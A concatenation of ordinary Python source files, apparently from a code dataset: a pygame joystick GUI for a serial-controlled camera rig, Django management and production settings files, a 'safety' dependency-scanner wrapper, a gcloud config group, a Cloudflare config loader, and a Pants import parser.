axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(2)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
else:
#print ("Other Controller Found")
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # A
button0Pressed = True
sendGO4()
#print("0 - A")
elif (joystick.get_button(1) and not button1Pressed): # B
button1Pressed = True
sendGO1()
#print("1 - B")
elif (joystick.get_button(2) and not button2Pressed): # X
button2Pressed = True
sendGO2()
#print("2 - X")
elif (joystick.get_button(3) and not button3Pressed): # Y
button3Pressed = True
sendGO3()
#print("3 - Y")
elif (joystick.get_button(4) and not button4Pressed): # L1
button4Pressed = True
sendSPEEDslow()
#print("4 - L1")
elif (joystick.get_button(5) and not button5Pressed): # R1
button5Pressed = True
sendSPEEDfast()
#print("5 - R1")
elif (joystick.get_button(6) and not button6Pressed): # L2
button6Pressed = True
isZooming = True
sendZOOMout()
#print("6 - L2")
elif (joystick.get_button(7) and not button7Pressed): # R2
button7Pressed = True
isZooming = True
sendZOOMin()
#print("7 - R2")
elif (joystick.get_button(8) and not button8Pressed): # Up
button8Pressed = True
sendSET3()
#print("8 - Up")
elif (joystick.get_button(9) and not button9Pressed): # Down
button9Pressed = True
sendSET4()
#print("9 - Down")
elif (joystick.get_button(10) and not button10Pressed): # Right
button10Pressed = True
sendSET1()
#print("10 - Right")
elif (joystick.get_button(11) and not button11Pressed): # Left
button11Pressed = True
sendSET2()
#print("11 - Left")
elif (joystick.get_button(12) and not button12Pressed): # Menu
button12Pressed = True
sendREPORTall()
#print("12 - Menu")
if event.type == pygame.JOYBUTTONUP:
if button6Pressed and not joystick.get_button(6):
button6Pressed = False
sendZOOMstop()
isZooming = False
elif button7Pressed and not joystick.get_button(7):
button7Pressed = False
sendZOOMstop()
isZooming = False
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = joystick.get_axis(1)
if (joyXread < deadRangeLow):
axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(2)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
if event.type == pygame.JOYBUTTONUP:
if (button0Pressed and not joystick.get_button(0)):
button0Pressed = False
elif (button1Pressed and not joystick.get_button(1)):
button1Pressed = False
elif (button2Pressed and not joystick.get_button(2)):
button2Pressed = False
elif (button3Pressed and not joystick.get_button(3)):
button3Pressed = False
elif (button4Pressed and not joystick.get_button(4)):
button4Pressed = False
elif (button5Pressed and not joystick.get_button(5)):
button5Pressed = False
elif (button6Pressed and not joystick.get_button(6)):
button6Pressed = False
elif (button7Pressed and not joystick.get_button(7)):
button7Pressed = False
elif (button8Pressed and not joystick.get_button(8)):
button8Pressed = False
elif (button9Pressed and not joystick.get_button(9)):
button9Pressed = False
elif (button10Pressed and not joystick.get_button(10)):
button10Pressed = False
elif (button11Pressed and not joystick.get_button(11)):
button11Pressed = False
elif (button12Pressed and not joystick.get_button(12)):
button12Pressed = False
elif (button13Pressed and not joystick.get_button(13)):
button13Pressed = False
elif (button14Pressed and not joystick.get_button(14)):
button14Pressed = False
if event.type == pygame.USEREVENT:
if (event.user_type == pygame_gui.UI_TEXT_ENTRY_FINISHED):
sendSerial(event.text)
serial_text_entry.set_text('')
if event.user_type == pygame_gui.UI_CONFIRMATION_DIALOG_CONFIRMED:
sendCLEARALLpos()
if event.user_type == pygame_gui.UI_BUTTON_PRESSED:
if event.ui_element == rel_button_L1:
sendLEFT1()
elif event.ui_element == rel_button_L10:
sendLEFT10()
elif event.ui_element == rel_button_R1:
sendRIGHT1()
elif event.ui_element == rel_button_R10:
sendRIGHT10()
elif event.ui_element == rel_button_U1:
sendUP1()
elif event.ui_element == rel_button_U10:
sendUP10()
elif event.ui_element == rel_button_D1:
sendDOWN1()
elif event.ui_element == rel_button_D10:
sendDOWN10()
#elif event.ui_element == rel_button_set0:
# sendRESETpos()
elif event.ui_element == rel_button_SR10:
sendSR1()
elif event.ui_element == rel_button_SR100:
sendSR10()
elif event.ui_element == rel_button_SL10:
sendSL1()
elif event.ui_element == rel_button_SL100:
sendSL10()
elif event.ui_element == rel_button_SET1:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET1()
elif event.ui_element == rel_button_SET2:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET2()
elif event.ui_element == rel_button_SET3:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET3()
elif event.ui_element == rel_button_SET4:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET4()
elif event.ui_element == rel_button_SET5:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET5()
elif event.ui_element == rel_button_SET6:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET6()
elif event.ui_element == rel_button_GO1:
if pos1set and not atPos1 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO1()
elif event.ui_element == rel_button_GO2:
if pos2set and not atPos2 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO2()
elif event.ui_element == rel_button_GO3:
if pos3set and not atPos3 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO3()
elif event.ui_element == rel_button_GO4:
if pos4set and not atPos4 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO4()
elif event.ui_element == rel_button_GO5:
if pos5set and not atPos5 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO5()
elif event.ui_element == rel_button_GO6:
if pos6set and not atPos6 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO6()
elif event.ui_element == rel_button_CLEARALL:
clearPosConfirm()
elif event.ui_element == rel_button_Refresh:
doRefresh()
elif event.ui_element == rel_button_SLOW:
sendSPEEDslow()
elif event.ui_element == rel_button_FAST:
sendSPEEDfast()
elif event.ui_element == rel_button_REPORT:
sendREPORTall()
elif event.ui_element == rel_button_REPORTPOS:
sendREPORTpos()
elif event.ui_element == rel_button_CLEARtext:
sendCLEARtext()
if (event.user_type == pygame_gui.UI_DROP_DOWN_MENU_CHANGED
and event.ui_element == drop_down_serial):
serialPort_changed()
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
if joyCircle.collidepoint(event.pos):
joyCircle_draging = True
mouse_x, mouse_y = event.pos
offset_x = joyCircle.x - mouse_x
offset_y = joyCircle.y - mouse_y
if sliderCircle.collidepoint(event.pos):
sliderCircle_draging = True
mouse_x, mouse_y = event.pos
sliderOffset_x = sliderCircle.x - mouse_x
sliderOffset_y = sliderCircle.y - mouse_y
if event.type == pygame.MOUSEBUTTONUP:
if event.button == 1:
if joyCircle_draging:
joyCircle_draging = False
joyCircle.x = 195
joyCircle.y = 195
axisX = int(0)
axisY = int(0)
if sliderCircle_draging:
sliderCircle_draging = False
sliderCircle.x = 195
sliderCircle.y = 415
axisZ = int(0)
mouseMoving = False
if isZooming:
sendZOOMstop()
isZooming = False
if event.type == pygame.MOUSEMOTION:
if joyCircle_draging:
mouseMoving = True
mouse_x, mouse_y = event.pos
joyCircle.x = mouse_x
joyCircle.y = mouse_y
"""
if ((mouse_x + offset_x) > mouseBorder) and ((mouse_y + offset_y) > mouseBorder): # XY Dot out of box: right & bottom
joyCircle.x = mouseBorder
joyCircle.y = mouseBorder
elif (((mouse_x + offset_x) > mouseBorder) and ((mouse_y + offset_y) < 30)): # XY Dot out of box: right & top
joyCircle.x = mouseBorder
joyCircle.y = 30
elif (((mouse_x + offset_x) < 30) and ((mouse_y + offset_y) > mouseBorder)): # XY Dot out of box: left & bottom
joyCircle.x = 30
joyCircle.y = mouseBorder
elif (((mouse_x + offset_x) < 30) and ((mouse_y + offset_y) < 30)): # XY Dot out of box: left & top
joyCircle.x = 30
joyCircle.y = 30
elif ((mouse_x + offset_x) > (mouseBorder)): # XY Dot out of box: right
joyCircle.x = mouseBorder
joyCircle.y = mouse_y + offset_y
elif ((mouse_x + offset_x) < 30): # XY Dot out of box: left
joyCircle.x = 30
joyCircle.y = mouse_y + offset_y
elif ((mouse_y + offset_y) > (mouseBorder)): # XY Dot out of box: bottom
joyCircle.y = mouseBorder
joyCircle.x = mouse_x + offset_x
elif ((mouse_y + offset_y) < 30): # XY Dot out of box: top
joyCircle.y = 30
joyCircle.x = mouse_x + offset_x
else:
"""
joyCircle.x = mouse_x + offset_x # XY Dot inside box
joyCircle.y = mouse_y + offset_y
axisX = int(scale((joyCircle.x), (30,mouseBorder), (-255,255)))
axisY = int(scale((joyCircle.y), (30,mouseBorder), (-255,255)))
if axisX > 255:
axisX = 255
if axisY > 255:
axisY = 255
if axisX < -255:
axisX = -255
if axisY < -255:
axisY = -255
if sliderCircle_draging:
mouseMoving = True
mouse_x, mouse_y = event.pos
sliderCircle.x = mouse_x
sliderCircle.y = 420
if ((mouse_x + sliderOffset_x) > mouseBorder): # Z Dot out of box: right
sliderCircle.x = mouseBorder
elif ((mouse_x + sliderOffset_x) < 30): # Z Dot out of box: left
sliderCircle.x = 30
else:
sliderCircle.x = mouse_x + sliderOffset_x # Z Dot inside box
axisZ = int(scale((sliderCircle.x), (30,mouseBorder), (-255,255)))
#axisXDOT = scale(axisX, (-255,255), (-1.0,1.0))
#axisYDOT = scale(axisY, (-255,255), (-1.0,1.0))
#axisZDOT = scale(axisZ, (-255,255), (-1.0,1.0))
#joyCircle.x = (axisXDOT*165)+210-radius
#joyCircle.y = (axisYDOT*165)+210-radius
#sliderCircle.x = (axisZDOT*165)+210-radius
while running:
time_delta = clock.tick() / 1000.0
time_delta_stack.append(time_delta)
process_events() # check for input
if (((axisX != oldAxisX) or (axisY != oldAxisY) or (axisZ != oldAxisZ)) and ((time.time() - previousTime) > 0.1)):
previousTime = time.time()
oldAxisX = axisX
oldAxisY = axisY
oldAxisZ = axisZ
axisXh = tohex(axisX, 16)
axisYh = tohex(-axisY, 16)
axisZh = tohex(axisZ, 16)
arr = [4, axisZh, axisXh, axisYh]
sendJoystick(arr)
#print(4,' - ', axisZh, ' - ', axisXh, ' - ', axisYh)
try:
readSerial()
except:
ser=''
current_serialPort = [' - ']
serialNotSel = 'Serial port disconnected.<br>'
textBoxSerial.kill()
serialText = serialNotSel + serialText
serialPortTextBox()
speedRec = False
pos1set = False
pos2set = False
pos3set = False
pos4set = False
pos5set = False
pos6set = False
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos1run = False
pos2run = False
pos3run = False
pos4run = False
pos5run = False
pos6run = False
ports = serial.tools.list_ports.comports() # Search for attached serial ports
available_ports = []
for p in ports:
available_ports.append(p.device) # Append each found serial port to array available_ports
drop_down_serial.kill()
drop_down_serial = UIDropDownMenu(available_ports, # Recreate serial port drop down list
current_serialPort[0], # Currently selected port
pygame.Rect((620,95),
(250, 30)),
ui_manager)
ui_manager.update(time_delta) # respond to input
# Clear screen
window_surface.blit(background_surface, (0, 0)) # draw graphics
# Draw position LEDs
if pos1set and not pos1run and not atPos1:
pygame.draw.circle(window_surface, RED, (60, 480), radius/2)
elif pos1set and not pos1run and atPos1:
pygame.draw.circle(window_surface, GREEN, (60, 480), radius/2)
elif pos1set and pos1run and not atPos1:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (60, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (60, 480), radius/2)
elif not pos1set:
pygame.draw.circle(window_surface, OFF, (60, 480), radius/2)
if pos2set and not pos2run and not atPos2:
pygame.draw.circle(window_surface, RED, (120, 480), radius/2)
elif pos2set and not pos2run and atPos2:
pygame.draw.circle(window_surface, GREEN, (120, 480), radius/2)
elif pos2set and pos2run and not atPos2:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (120, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (120, 480), radius/2)
elif not pos2set:
pygame.draw.circle(window_surface, OFF, (120, 480), radius/2)
if pos3set and not pos3run and not atPos3:
pygame.draw.circle(window_surface, RED, (180, 480), radius/2)
elif pos3set and not pos3run and atPos3:
pygame.draw.circle(window_surface, GREEN, (180, 480), radius/2)
elif pos3set and pos3run and not atPos3:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (180, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (180, 480), radius/2)
elif not pos3set:
pygame.draw.circle(window_surface, OFF, (180, 480), radius/2)
if pos4set and not pos4run and not atPos4:
pygame.draw.circle(window_surface, RED, (240, 480), radius/2)
elif pos4set and not pos4run and atPos4:
pygame.draw.circle(window_surface, GREEN, (240, 480), radius/2)
elif pos4set and pos4run and not atPos4:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (240, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (240, 480), radius/2)
elif not pos4set:
pygame.draw.circle(window_surface, OFF, (240, 480), radius/2)
if pos5set and not pos5run and not atPos5:
pygame.draw.circle(window_surface, RED, (300, 480), radius/2)
elif pos5set and not pos5run and atPos5:
pygame.draw.circle(window_surface, GREEN, (300, 480), radius/2)
elif pos5set and pos5run and not atPos5:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (300, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (300, 480), radius/2)
elif not pos5set:
pygame.draw.circle(window_surface, OFF, (300, 480), radius/2)
if pos6set and not pos6run and not atPos6:
pygame.draw.circle(window_surface, RED, (360, 480), radius/2)
elif pos6set and not pos6run and atPos6:
pygame.draw.circle(window_surface, GREEN, (360, 480), radius/2)
elif pos6set and pos6run and not atPos6:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (360, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (360, 480), radius/2)
elif not pos6set:
pygame.draw.circle(window_surface, OFF, (360, 480), radius/2)
# Blink timer for position LEDs
if previousTicks <= pygame.time.get_ticks():
blinkSet = not blinkSet
previousTicks = pygame.time.get_ticks() + interval
# Only enable sending of Report after delay
if canSendReport and (previousTicksReport <= pygame.time.get_ticks()):
canSendReport = False
temp='^r'
sendSerial(temp)
# Speed LEDs
if speedRec and speedIsFast:
pygame.draw.circle(window_surface, GREEN, (460, 130), radius/2)
elif speedRec and not speedIsFast:
pygame.draw.circle(window_surface, GREEN, (460, 190), radius/2)
ui_manager.draw_ui(window_surface) # draw UI
# Draw W A S D Letters
window_surface.blit(textsurfaceW,(198,28)) # W
window_surface.blit(textsurfaceA,(35,190)) # A
window_surface.blit(textsurfaceS,(205,355)) # S
window_surface.blit(textsurfaceD,(365,190)) # D
window_surface.blit(textsurfaceLeft,(35,415)) # ,
window_surface.blit(textsurfaceRight,(375,415)) # .
axisXDOT = scale(axisX, (-255,255), (-1.0,1.0))
axisYDOT = scale(axisY, (-255,255), (-1.0,1.0))
axisZDOT = scale(axisZ, (-255,255), (-1.0,1.0))
axisTestDot = pygame.math.Vector2((axisXDOT*10), (axisYDOT*10))
xCircle = axisXDOT * math.sqrt(1 - 0.5*axisYDOT**2)
yCircle = axisYDOT * math.sqrt(1 - 0.5*axisXDOT**2)
#joyCircle.x = (axisXDOT*165)+210-radius
#joyCircle.y = (axisYDOT*165)+210-radius
sliderCircle.x = (axisZDOT*165)+210-radius
joyCircle.x = (xCircle*165)+210-radius
joyCircle.y = (yCircle*165)+210-radius
# Draw draggable red dots
#pygame.draw.circle(window_surface, RED, (joyCircle.x+radius,joyCircle.y+radius), radius)
pygame.draw.circle(window_surface, RED, (axisTestDot), radius)
pygame.draw.circle(window_surface, RED, (sliderCircle.x+radius,430), radius)
# TEST
#pygame.draw.circle(window_surface, GREEN, (axisX+radius,axisY+radius), radius)
# Draw boxes that bound red dots
#pygame.draw.rect(window_surface, [125,0,0], [30,30,360,360],width=3)
pygame.draw.rect(window_surface, [125,0,0], [30,400,360,60],width=3)
pygame.draw.circle(window_surface, [125,0,0], (210,210),180+(radius/2),width=3)
mouse = pygame.mouse.get_pos()
# Zoom In & Out button highlights
if 482 <= mouse[0] <= 482+56 and 262 <= mouse[1] <= 262+56:
pygame.draw.rect(window_surface,colour_light,[482,262,56,56])
else:
pygame.draw.rect(window_surface,colour_dark,[482,262,56,56])
if 482 <= mouse[0] <= 482+56 and 322 <= mouse[1] <= 322+56:
pygame.draw.rect(window_surface,colour_light,[482,322,56,56])
else:
pygame.draw.rect(window_surface,colour_dark,[482,322,56,56])
# Display Zoom In & Zoom Out text inside their buttons
window_surface.blit(zoomINtext, (500, 278))
window_surface.blit(zoomOUTtext, (491, 338))
pygame.display.update()
clk.tick(40) |
py | 1a40cbf50a31781c92204348b434ec0374b4cc2f | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test312_1.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
py | 1a40ccaf4d581eda75eba2c23c00af1811b2ed59 | from IPython.parallel import Client
from random import uniform
from simul import Particle
def scatter_gather(nparticles):
particles = [Particle(uniform(-1.0, 1.0),
uniform(-1.0, 1.0),
uniform(-1.0, 1.0)) for i in range(nparticles)]
rc = Client()
dview = rc[:]
dview.scatter('particle_chunk', particles).get()
dview.execute('from simul import ParticleSimulator')
dview.execute('simulator = ParticleSimulator(particle_chunk)')
dview.execute('simulator.evolve_cython(0.1)')
particles = dview.gather('particle_chunk', block=True)
|
py | 1a40ccbe7601bfd0716a5c617a309b1c988d1f70 | #!/usr/bin/python3
# coding=utf-8
# pylint: disable=I0011,E0401,W0702,W0703
# Copyright 2019 getcarrier.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Scanner: safety
"""
import os
import subprocess
from dusty.tools import log
from dusty.models.module import DependentModuleModel
from dusty.models.scanner import ScannerModel
from .parser import parse_findings
class Scanner(DependentModuleModel, ScannerModel):
""" Scanner class """
def __init__(self, context):
""" Initialize scanner instance """
super().__init__()
self.context = context
self.config = \
self.context.config["scanners"][__name__.split(".")[-3]][__name__.split(".")[-2]]
def execute(self):
""" Run the scanner """
targets = self.config.get("requirements", "requirements.txt")
if isinstance(targets, str):
targets = [targets]
options = list()
for target in targets:
options.append("-r")
options.append(target)
task = subprocess.run(
["safety", "check", "--json"] + options,
stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
log.log_subprocess_result(task)
parse_findings(task.stdout.decode("utf-8", errors="ignore"), self)
# Save intermediates
self.save_intermediates(task.stdout)
def save_intermediates(self, task_stdout):
""" Save scanner intermediates """
if self.config.get("save_intermediates_to", None):
log.info("Saving intermediates")
base = os.path.join(self.config.get("save_intermediates_to"), __name__.split(".")[-2])
try:
# Make directory for artifacts
os.makedirs(base, mode=0o755, exist_ok=True)
# Save report
with open(os.path.join(base, "report.json"), "w") as report:
report.write(task_stdout.decode("utf-8", errors="ignore"))
except:
log.exception("Failed to save intermediates")
@staticmethod
def fill_config(data_obj):
""" Make sample config """
data_obj.insert(
len(data_obj), "requirements", "requirements.txt",
comment="path to requirements.txt (string or list of strings)"
)
data_obj.insert(
len(data_obj), "save_intermediates_to", "/data/intermediates/dast",
comment="(optional) Save scan intermediates (raw results, logs, ...)"
)
@staticmethod
def validate_config(config):
""" Validate config """
required = []
not_set = [item for item in required if item not in config]
if not_set:
error = f"Required configuration options not set: {', '.join(not_set)}"
log.error(error)
raise ValueError(error)
@staticmethod
def get_name():
""" Module name """
return "safety"
@staticmethod
def get_description():
""" Module description or help message """
return "Python dependency analyzer"
|
py | 1a40ccd5bc2dcd45294c1977b646714d355892b0 | # -*- coding: utf-8 -*- #
# Copyright 2013 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""config command group."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.core import properties
@base.ReleaseTracks(base.ReleaseTrack.ALPHA, base.ReleaseTrack.BETA,
base.ReleaseTrack.GA)
class Config(base.Group):
"""View and edit Cloud SDK properties.
The {command} command group lets you set, view and unset properties used by
Cloud SDK.
A configuration is a set of properties that govern the behavior of `gcloud`
and other Cloud SDK tools. The initial `default` configuration is set when
`gcloud init` is run. You can create additional named configurations using
`gcloud init` or `{command} configurations create`.
To display the path of the active configuration along with information
about the current `gcloud` environment, run $ gcloud info.
To switch between configurations, use `{command} configurations activate`.
gcloud supports several flags that have the same effect as properties in
a configuration (for example, gcloud supports both the `--project` flag and
`project` property). Properties differ from flags in that flags affect command
behavior on a per-invocation basis. Properties allow you to maintain the same
settings across command executions.
For more information on configurations, see `gcloud topic configurations`.
## AVAILABLE PROPERTIES
{properties}
"""
category = base.SDK_TOOLS_CATEGORY
detailed_help = {
'properties': properties.VALUES.GetHelpString(),
}
|
py | 1a40cd63acb6707162eefba40c4e30c6a71971b9 | import json
def get_config():
"""
Return credentials.
Either monkey patch this, or write a configuration file for it to read.
"""
# Yola's internal configuration system:
try:
from yoconfig import get_config
return get_config('cloudflare')
except ImportError:
pass
with open('configuration.json') as f:
return json.load(f)['common']['cloudflare']
|
py | 1a40ce809dfa0a777e1df4eaca14f7e5c9870564 | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import ast as ast3
import re
import sys
from dataclasses import dataclass
from typing import Optional, Set, Tuple
from typed_ast import ast27
from pants.util.memo import memoized_property
from pants.util.ordered_set import FrozenOrderedSet
from pants.util.strutil import ensure_text
class ImportParseError(ValueError):
pass
@dataclass(frozen=True)
class ParsedPythonImports:
"""All the discovered imports from a Python source file.
Explicit imports are imports from `import x` and `from module import x` statements. Inferred
imports come from strings that look like module names, such as
`importlib.import_module("example.subdir.Foo")`.
"""
explicit_imports: FrozenOrderedSet[str]
inferred_imports: FrozenOrderedSet[str]
@memoized_property
def all_imports(self) -> FrozenOrderedSet[str]:
return FrozenOrderedSet(sorted([*self.explicit_imports, *self.inferred_imports]))
def parse_file(source_code: str) -> Optional[Tuple]:
try:
# NB: The Python 3 ast is generally backwards-compatible with earlier versions. The only
# breaking change is `async` `await` becoming reserved keywords in Python 3.7 (deprecated
# in 3.6). If the std-lib fails to parse, we could use typed-ast to try parsing with a
# target version of Python 3.5, but we don't because Python 3.5 is almost EOL and has very
# low usage.
# We will also fail to parse Python 3.8 syntax if Pants is run with Python 3.6 or 3.7.
# There is no known workaround for this, beyond users changing their `./pants` script to
# always use >= 3.8.
tree = ast3.parse(source_code)
visitor_cls = _Py3AstVisitor if sys.version_info[:2] < (3, 8) else _Py38AstVisitor
return tree, visitor_cls
except SyntaxError:
try:
return ast27.parse(source_code), _Py27AstVisitor
except SyntaxError:
return None
def find_python_imports(source_code: str, *, module_name: str) -> ParsedPythonImports:
parse_result = parse_file(source_code)
# If there were syntax errors, gracefully early return. This is more user friendly than
# propagating the exception. Dependency inference simply won't be used for that file, and
# it'll be up to the tool actually being run (e.g. Pytest or Flake8) to error.
if parse_result is None:
return ParsedPythonImports(FrozenOrderedSet(), FrozenOrderedSet())
tree, ast_visitor_cls = parse_result
ast_visitor = ast_visitor_cls(module_name)
ast_visitor.visit(tree)
return ParsedPythonImports(
explicit_imports=FrozenOrderedSet(sorted(ast_visitor.explicit_imports)),
inferred_imports=FrozenOrderedSet(sorted(ast_visitor.inferred_imports)),
)
# This regex is used to infer imports from strings, e.g.
# `importlib.import_module("example.subdir.Foo")`.
_INFERRED_IMPORT_REGEX = re.compile(r"^([a-z_][a-z_\d]*\.){2,}[a-zA-Z_]\w*$")
class _BaseAstVisitor:
def __init__(self, module_name: str) -> None:
self._module_parts = module_name.split(".")
self.explicit_imports: Set[str] = set()
self.inferred_imports: Set[str] = set()
def maybe_add_inferred_import(self, s: str) -> None:
if _INFERRED_IMPORT_REGEX.match(s):
self.inferred_imports.add(s)
def visit_Import(self, node) -> None:
for alias in node.names:
self.explicit_imports.add(alias.name)
def visit_ImportFrom(self, node) -> None:
rel_module = node.module
abs_module = ".".join(
self._module_parts[0 : -node.level] + ([] if rel_module is None else [rel_module])
)
for alias in node.names:
self.explicit_imports.add(f"{abs_module}.{alias.name}")
class _Py27AstVisitor(ast27.NodeVisitor, _BaseAstVisitor):
def visit_Str(self, node) -> None:
val = ensure_text(node.s)
self.maybe_add_inferred_import(val)
class _Py3AstVisitor(ast3.NodeVisitor, _BaseAstVisitor):
def visit_Str(self, node) -> None:
self.maybe_add_inferred_import(node.s)
class _Py38AstVisitor(ast3.NodeVisitor, _BaseAstVisitor):
# Python 3.8 deprecated the Str node in favor of Constant.
def visit_Constant(self, node) -> None:
if isinstance(node.value, str):
self.maybe_add_inferred_import(node.value)
|
py | 1a40cf3f7edd5fa7bf4e104c01201ff3279b49c5 | from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env("DJANGO_SECRET_KEY")
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["example.com"])
# DATABASES
# ------------------------------------------------------------------------------
DATABASES["default"] = env.db("DATABASE_URL") # noqa F405
DATABASES["default"]["ATOMIC_REQUESTS"] = True # noqa F405
DATABASES["default"]["CONN_MAX_AGE"] = env.int("CONN_MAX_AGE", default=60) # noqa F405
# CACHES
# ------------------------------------------------------------------------------
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": env("REDIS_URL"),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
# Mimicing memcache behavior.
# http://niwinz.github.io/django-redis/latest/#_memcached_exceptions_behavior
"IGNORE_EXCEPTIONS": True,
},
}
}
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure
SESSION_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure
CSRF_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds
# TODO: set this to 60 seconds first and then to 518400 once you prove the former works
SECURE_HSTS_SECONDS = 60
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True
)
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload
SECURE_HSTS_PRELOAD = env.bool("DJANGO_SECURE_HSTS_PRELOAD", default=True)
# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True
)
# STORAGES
# ------------------------------------------------------------------------------
# https://django-storages.readthedocs.io/en/latest/#installation
INSTALLED_APPS += ["storages"] # noqa F405
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = env("DJANGO_AWS_ACCESS_KEY_ID")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_SECRET_ACCESS_KEY = env("DJANGO_AWS_SECRET_ACCESS_KEY")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
